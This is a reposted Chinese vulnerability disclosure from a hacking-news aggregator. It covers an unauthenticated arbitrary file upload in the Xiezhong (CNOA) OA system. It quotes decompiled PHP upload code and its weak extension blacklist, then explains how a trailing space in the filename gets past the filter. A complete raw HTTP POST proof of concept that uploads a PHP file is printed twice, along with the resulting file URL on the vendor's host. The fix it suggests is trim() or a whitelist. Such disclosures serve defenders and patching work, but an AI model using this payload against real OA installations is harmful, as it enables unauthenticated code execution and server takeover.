记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

协众OA系统任意文件上传 (无需登录)

2014-10-11 23:25

代码用了zend加密,可decode大部分代码。

web目录的存在一处配置文件 www\file\webcache\noNeedCheckPermitActionList.data.php

通过代码逻辑,这里面涉及的controller和方法应该是不需要登陆验证的,

其中www\app\main\source\mainCommon.class.php:

public function actionUpfile( )

{

global $CNOA_DB;

$act = getpar( $_GET, "act", "" );

@ini_set( "default_socket_timeout", "86400" );

@ini_set( "max_input_time", "86400" );

set_time_limit( 0 );

$CNOA_FS = new fs( );

$file_ext = strtolower( strrchr( $_FILES['Filedata']['name'], "." ) );

$file_name = $CNOA_FS->mkName( ).$file_ext;

if ( $act == "upforhtmleditor" )

{

$savePath = CNOA_PATH_FILE."/common/upload/".date( "Y.m.d", $GLOBALS['CNOA_TIMESTAMP'] )."/";

$viewPath = "{$GLOBALS['URL_FILE']}/common/upload/".date( "Y.m.d", $GLOBALS['CNOA_TIMESTAMP'] )."/";

mkdirs( $savePath );

$file_dst = $savePath.$file_name;

filterphpfileupload( );

@move_uploaded_file( @$_FILES['Filedata']['tmp_name'], $file_dst );

echo $viewPath.$file_name;

exit( );

}

$file_dst = CNOA_PATH_FILE."/common/temp/".$file_name;

filterphpfileupload( );

@move_uploaded_file( @$_FILES['Filedata']['tmp_name'], $file_dst );

echo $file_name;

exit( );

}





$file_ext 直接取的上传文件的后缀,但是后面有一个filterphpfileupload()函数对上传文件检查,跟踪这个函数,在www\core\inc\function.func.php 中:

function filterPHPFileUpload( )

{

foreach ( $_FILES as $k => $v )

{

$ext = strtolower( strrchr( $v['name'], "." ) );

if ( in_array( $ext, array( ".php", ".phpx", ".php3" ) ) )

{

$arr = array( );

$arr['failure'] = TRUE;

$arr['msg'] = "不允许上传php文件";

echo json_encode( $arr );

exit( );

break;

}

}

}



上传文件名后直接加空格直接bypass。



poc(无需登录):



POST /index.php?action=upFile&act=upforhtmleditor HTTP/1.1

Host: oa.cnoa.cn

Proxy-Connection: keep-alive

Content-Length: 304

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: null

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCy4HVT4TPkeHYzqA

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: CNOA_LOGIN_USERNAME=c1OiJhZG1pbiI7; CNOA_language=cn; CNOAOASESSID=ssddfhsd2diu71c2s9ss



------WebKitFormBoundaryCy4HVT4TPkeHYzqA

Content-Disposition: form-data; name="Filedata"; filename="1.php "

Content-Type: text/plain



<?php

phpinfo();

?>



------WebKitFormBoundaryCy4HVT4TPkeHYzqA

Content-Disposition: form-data; name="submit"



Submit

------WebKitFormBoundaryCy4HVT4TPkeHYzqA--

漏洞证明:

http://oa.cnoa.cn/file/common/upload/2014.08.27/20140827181850_2e6b714026603a9b847b64d59f7c37d9.cnoa.php





poc(无需登录):



POST /index.php?action=upFile&act=upforhtmleditor HTTP/1.1

Host: oa.cnoa.cn

Proxy-Connection: keep-alive

Content-Length: 304

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: null

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCy4HVT4TPkeHYzqA

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: CNOA_LOGIN_USERNAME=c1OiJhZG1pbiI7; CNOA_language=cn; CNOAOASESSID=ssddfhsd2diu71c2s9ss



------WebKitFormBoundaryCy4HVT4TPkeHYzqA

Content-Disposition: form-data; name="Filedata"; filename="1.php "

Content-Type: text/plain



<?php

phpinfo();

?>



------WebKitFormBoundaryCy4HVT4TPkeHYzqA

Content-Disposition: form-data; name="submit"



Submit

------WebKitFormBoundaryCy4HVT4TPkeHYzqA--



cnoa.PNG



修复方案:

trim() Or 白名单

知识来源: www.wooyun.org/bugs/wooyun-2014-073972

阅读:370576 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“协众OA系统任意文件上传 (无需登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云